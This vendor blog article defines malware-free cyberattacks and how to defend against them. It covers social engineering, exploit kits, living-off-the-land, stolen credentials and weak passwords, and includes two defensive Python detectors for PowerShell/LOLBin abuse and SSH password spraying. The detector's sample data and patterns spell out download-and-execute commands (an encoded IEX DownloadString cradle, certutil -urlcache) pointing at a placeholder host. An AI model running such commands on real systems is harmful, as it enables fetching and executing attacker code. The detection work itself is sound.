January 19, 2024

What are malware-free cyberattacks?

NetworkTigers defines malware-free cyberattacks and how to defend yourself.

Spyware, crypto stealers, RATs, and more are often cited as the primary means hackers carry out their misdeeds. Less often described, however, is the malware-free cyberattack. These attacks are gaining popularity, with crafty criminals using harder-to-spot techniques to part individuals with their data and penetrate targeted networks undetected.

Malware-free cyberattacks explained

Defined simply, a malware-free cyberattack is one in which a threat actor relies on legitimate tools, system files, applications, and social engineering to compromise a victim network instead of delivering a malicious executable of their own to it.

A malware-free cyberattack could see a threat actor exploiting a flaw in an unpatched piece of software, misusing features that are built into an application or the operating system (PowerShell, WMI, and remote administration tools are common choices), or simply talking a victim into cooperating over a phone call or messaging platform.

While the end goal of a network breach or data theft remains the same, malware-free attacks are steadily increasing as endpoint defenses become more effective at identifying known malicious files. CrowdStrike's 2023 Global Threat Report, for example, found that 71% of the detections it recorded in 2022 involved no malware at all.

By operating without malware, a threat actor leaves no malicious file for signature-based antivirus to flag. The activity looks like an ordinary user running ordinary tools, so it has to be caught by its behavior rather than by its payload.

Ways that hackers can attack without malware

Social engineering

Social engineering attacks are a common form of malware-free cyberattack, as they require no coding and, often, no deep technical knowledge at all. Social engineering can present as a phone call, text message, email, or other interaction in which a threat actor attempts to trick a victim into handing over sensitive information willingly.

By using various means of manipulation, many threat actors opt to “hack” people instead of their devices.

A threat actor adept at social engineering may pose as a concerned customer, a colleague, a known associate, a family member, or even a member of a government agency. In some cases, social engineering is used in tandem with other techniques. This may include persuading a victim to allow the threat actor remote control of their computer, or convincing them to install a legitimate remote-access tool that gives the attacker a foothold on whatever network the victim is connected to.

Exploit kits

Apps, platforms, and operating systems are complex systems that often harbor flaws or bugs that can be exploited for nefarious purposes. 

Exploit kits are packaged collections of exploit code, command sequences, and supporting data that attackers use to turn a system against itself. Bought and sold on hacker forums, marketplaces, and message boards, an exploit kit typically fingerprints a visiting browser, its plugins, and the underlying operating system, identifies an unpatched vulnerability, and serves the matching exploit tailored to the victim's specific configuration.

When the code that results runs only in memory and then hands control to tools that are already on the machine, such as PowerShell, WMI, or certutil, the attack is described as fileless or as living off the land (LOTL). No new executable is written to disk, so file-scanning defenses have nothing to inspect; what remains visible is the unusual behavior of legitimate programs.
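Because living-off-the-land activity leaves no file to scan, defenders look instead at how built-in tools are launched. The following is an added example, written for this article rather than taken from NetworkTigers or any vendor product, of the kind of process-creation check an endpoint detection rule performs: it decodes PowerShell's `-EncodedCommand` argument (base64 of UTF-16LE, which PowerShell accepts under any unambiguous prefix such as `-e` or `-enc`), looks for download-and-execute patterns and LOLBin abuse in both the raw and decoded command line, and weighs an Office application spawning a shell. The sample events, the indicator list, the weights, and the alert threshold are all constructed for illustration and are not tuned values.

```python
import base64
import binascii
import re

# Document handlers that rarely have a legitimate reason to spawn a shell.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line patterns typical of in-memory download-and-execute chains, with a
# weight each. Weights and the alert threshold are illustrative tuning choices.
INDICATORS = {
    "invoke-expression": (1, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    "web-download": (2, re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I)),
    "hidden-window": (1, re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    "embedded-base64": (1, re.compile(r"frombase64string", re.I)),
    "bypass-policy": (1, re.compile(r"-ex(ecutionpolicy)?\s+bypass", re.I)),
    "lolbin-download": (3, re.compile(
        r"certutil(\.exe)?\s.*-urlcache|bitsadmin(\.exe)?\s.*/transfer|"
        r"mshta(\.exe)?\s+https?:|regsvr32(\.exe)?\s.*/i:https?:", re.I)),
}
WEIGHTS = {"office-spawned-shell": 2, "encoded-command": 1, **{k: w for k, (w, _) in INDICATORS.items()}}
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell accepts any unambiguous prefix of the switch (-e, -ec, -enc, ...)
    and expects base64 of the UTF-16LE script; attackers favor the short forms.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok.lstrip("-/").lower()
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None  # malformed payload; PowerShell would reject it too
    return None


def analyze_event(parent, cmdline):
    """Score one process-creation event (parent image, child command line)."""
    image = cmdline.split()[0].lower().rsplit("\\", 1)[-1].strip('"')
    decoded = decode_encoded_command(cmdline)
    hits = []
    if parent.lower() in OFFICE_PARENTS and image in SHELLS:
        hits.append("office-spawned-shell")
    if decoded is not None:
        hits.append("encoded-command")
    # Match against both the raw line and the decoded script, so encoding the
    # payload does not hide it from the indicators.
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits += [name for name, (_, rx) in INDICATORS.items() if rx.search(text)]
    score = sum(WEIGHTS[h] for h in hits)
    return {"parent": parent, "image": image, "decoded": decoded,
            "indicators": hits, "score": score, "suspicious": score >= ALERT_THRESHOLD}


def scan_events(events):
    return [analyze_event(parent, cmdline) for parent, cmdline in events]


def _ps_encode(script):
    """Encode a script the way `powershell -EncodedCommand` expects (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not real telemetry): (parent image, child command line).
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users"),
    ("winword.exe", "powershell.exe -w hidden -NoP -enc " + _ps_encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")),
    ("cmd.exe", "certutil.exe -urlcache -split -f http://example.invalid/x.txt x.txt"),
    ("services.exe", "svchost.exe -k netsvcs"),
    ("explorer.exe", "powershell.exe -e " + _ps_encode("Get-Process | Sort-Object CPU")),
]

if __name__ == "__main__":
    for r in scan_events(SAMPLE_EVENTS):
        flag = "ALERT" if r["suspicious"] else "ok   "
        print(f"{flag} {r['parent']} -> {r['image']} score={r['score']} {r['indicators']}")
```

Run as a script, the block flags the Word-spawned encoded downloader and the certutil fetch, and leaves the plain directory listing, the service host, and the administrator's harmless encoded one-liner alone. Note that the last case only scores on `encoded-command`: encoding by itself is not evidence, which is why the check combines several weak signals rather than alerting on any one of them.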

Because exploit kits depend on known but unpatched flaws somewhere among the many components that make up a system, users must keep their systems continually updated to prevent hackers from pouncing on any newly discovered weaknesses.

Log4Shell (CVE-2021-44228), the flaw in Apache's Log4j logging library disclosed in December 2021, and the fact that it is still being leveraged, are examples of how dangerous a single weakness can prove when hackers understand how to take advantage of it.

Stolen credentials

Threat actors will always choose the path of least resistance when it comes to cybercrime, and nothing is easier than simply unlocking the front door with a key.

Login credentials can be grabbed in several different ways. In some cases, they can be purchased by the thousands from hackers who have already done the dirty work of penetrating a system and exfiltrating its data. They can also be gained via social engineering, or with tools that replay leaked username and password pairs against other sites (credential stuffing) or try a handful of commonly used passwords against a long list of accounts (password spraying).

No matter the means of procurement, when a threat actor logs in with stolen credentials, they are granted the same access as the legitimate user and will not trip any defense that is looking for malicious files. What can still give them away is behavior: a login from an unfamiliar location or at an unusual hour, a burst of failed attempts shortly before the success, or a long-dormant account suddenly becoming active.
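The credential attacks described above do leave a trace in authentication logs, and the trace is the defender's main opportunity. The following is an added example, not NetworkTigers' own tooling, of the detection logic a SOC would run over such logs: it parses sshd-style "Failed password" and "Accepted password" lines, groups them by source address within a sliding window, and raises one alert per address for password spraying (many distinct accounts), brute force (one account, many attempts), and a successful login that immediately follows a run of failures, which is the signature of a guessed or stuffed password that worked. The log lines, the host name `bastion`, the RFC 5737 test addresses, and the thresholds are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# sshd-style authentication lines; the same approach works for any log that
# records (timestamp, outcome, username, source address).
LOG_RE = re.compile(
    r"^(?P<ts>\S+) \S+ sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$")


def parse_line(line):
    """Return a dict for one authentication event, or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return {"ts": ts, "ok": m["result"] == "Accepted", "user": m["user"], "ip": m["ip"]}


def detect(lines, window_minutes=10, spray_users=5, brute_attempts=6, fails_before_success=3):
    """Flag credential attacks per source IP within a sliding time window.

    password-spray:         failures against many distinct accounts from one IP
    brute-force:            many failures against a single account from one IP
    success-after-failures: a successful login from an IP that was just failing,
                            i.e. a guessed, stuffed or sprayed password that worked
    The thresholds are illustrative defaults, not tuned values.
    """
    window = timedelta(minutes=window_minutes)
    by_ip = defaultdict(list)
    for e in sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)

    alerts, seen = [], set()
    for ip, events in by_ip.items():
        for i, e in enumerate(events):
            recent_fails = [x for x in events[:i + 1]
                            if not x["ok"] and e["ts"] - x["ts"] <= window]
            users = {x["user"] for x in recent_fails}
            kinds = []
            if not e["ok"]:
                if len(users) >= spray_users:
                    kinds.append("password-spray")
                if len(users) == 1 and len(recent_fails) >= brute_attempts:
                    kinds.append("brute-force")
            elif len(recent_fails) >= fails_before_success:
                kinds.append("success-after-failures")
            for kind in kinds:
                if (ip, kind) not in seen:  # one alert per source IP and type
                    seen.add((ip, kind))
                    alerts.append({"type": kind, "ip": ip, "user": e["user"],
                                   "failures": len(recent_fails),
                                   "distinct_users": len(users),
                                   "at": e["ts"].isoformat()})
    return alerts


def _line(ts, result, user, ip, port):
    return f"{ts} bastion sshd[4242]: {result} password for {user} from {ip} port {port} ssh2"


# Constructed sample log (not real data): a spray that lands on one account, a
# brute-force run against root, a user mistyping their own password, and noise.
SAMPLE_LOG = (
    [_line(f"2024-01-19T08:00:0{i + 1}Z", "Failed", u, "203.0.113.7", 51000 + i)
     for i, u in enumerate(["alice", "bob", "carol", "dave", "erin", "frank"])]
    + [_line("2024-01-19T08:00:10Z", "Accepted", "dave", "203.0.113.7", 51010)]
    + [_line(f"2024-01-19T08:30:{i:02d}Z", "Failed", "root", "203.0.113.9", 40000 + i)
       for i in range(8)]
    + [_line("2024-01-19T09:00:00Z", "Failed", "alice", "198.51.100.4", 33000),
       _line("2024-01-19T09:00:05Z", "Accepted", "alice", "198.51.100.4", 33001),
       "2024-01-19T09:00:06Z bastion sshd[4242]: Connection closed by 198.51.100.4 port 33002 [preauth]"]
)

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a['at']} {a['type']:<22} src={a['ip']} user={a['user']} "
              f"failures={a['failures']} accounts={a['distinct_users']}")
```

The single mistyped password from 198.51.100.4 produces no alert, while the spraying address is reported twice: once when it crosses five distinct accounts and again when the login for `dave` succeeds on the back of six failures. That second alert is the one worth paging on, because it identifies the credential that now needs to be reset.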

Poor password hygiene

Users are encouraged to generate hard-to-guess passwords full of randomized letters, numbers, and symbols. However, these types of passwords are, by their very design, nearly impossible to remember, and many people resort to using the same simple password across multiple accounts or, worse yet, never changing the default password that comes with their devices.

Using the same password for numerous platforms means that a compromise of one account is essentially a compromise of someone’s entire online footprint. Threat actors understand human nature and, upon gaining login credentials, will get right to work seeing if those same passwords work on a victim’s email, social media accounts, banking institutions, and more.

Certain devices, most notably wireless routers, ship with a default password printed on a label that users enter during setup. Most users, including those who should know better, continue to use that password for as long as they own the device.

Threat actors have access to lists of these default passwords, so every one of them should be assumed compromised on the day of delivery. People who retain default passwords are low-hanging fruit and expose their devices, data, and network to a malware-free cyberattack that requires nothing more than logging in.

How to defend against malware-free cyberattacks

The trouble with malware-free attacks is that no single control defends against so many different intrusion strategies. While viruses and trojans can be kept at bay largely automatically by robust, up-to-date antivirus software, preventing a malware-free attack requires ongoing attention to people, credentials, and patching.

Maintain good password hygiene. Don't reuse passwords, and use a password manager so that every credential can be long, unique, and never memorized. Change default passwords on any hardware after your initial setup is complete. Turn on multi-factor authentication wherever it is offered, so that a stolen or guessed password is not enough on its own to log in.

Know how to spot a social engineering scheme. Employee training and good judgment are the best defenses against an attack designed to appeal to someone's humanity. Teach workers how to identify phishing emails and fraudulent messages, and to verify any unusual request through a second channel they already trust, such as calling back on a known number. In the age of deepfakes, consider creating verbal or written code words that can be used to identify whether or not the person on the other end of the line is an imposter.

Keep systems up to date. By automating updates and keeping every platform, OS, and app current, you remove the known vulnerabilities that exploit kits are built to find. Don't allow any component of your network to fall behind.

About NetworkTigers


NetworkTigers is the leader in the secondary market for Grade A, seller-refurbished networking equipment. Founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms, NetworkTigers provides consulting and network equipment to global governmental agencies, Fortune 2000, and healthcare companies. www.networktigers.com

Derek Walborn
Derek Walborn is a freelance research-based technical writer. He has worked as a content QA analyst for AT&T and Pernod Ricard.
